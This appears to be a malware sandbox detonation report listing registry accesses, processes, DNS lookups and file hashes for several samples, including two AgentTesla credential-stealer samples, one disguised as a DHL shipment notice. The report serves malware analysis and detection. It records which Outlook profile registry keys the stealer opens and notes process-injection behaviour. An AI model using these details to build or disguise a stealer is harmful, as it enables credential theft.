Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\I795405_33242211.xls"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 25.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 217.194.19.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 de643de789f31affa9257ebec8e9965e
SHA1 342b94a4511f76030be21621bbc0bf1129002eda
SHA256 02d7a3debe26df33a03ab55c4a9fa49befd762a4cd60780ba9717a1b670b97f7
SHA512 8b3ec35f1e261c7b36ccdd24220f0acb14072536b91d9a65ec002bf44018ed6cc7f51ea6c0caad27172ea44b6036a865baa62743ce82dd4bc8ea8531574984c8

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\systeminfo.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\systeminfo.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\systeminfo.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\systeminfo.exe

"C:\Users\Admin\AppData\Local\Temp\systeminfo.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 25.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\wecutil.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\wecutil.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\wecutil.exe

"C:\Users\Admin\AppData\Local\Temp\wecutil.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 106.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

139s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3056 set thread context of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"

C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 71.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 71.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL SHIPMENT NOTIFICATION 284748395PD.exe.log

MD5 8ec831f3e3a3f77e4a7b9cd32b48384c
SHA1 d83f09fd87c5bd86e045873c231c14836e76a05c
SHA256 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA512 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

128s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1812 set thread context of 764 N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe C:\Users\Admin\AppData\Local\Temp\EZ0496.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\EZ0496.exe

"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"

C:\Users\Admin\AppData\Local\Temp\EZ0496.exe

"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"

Network

N/A

Files
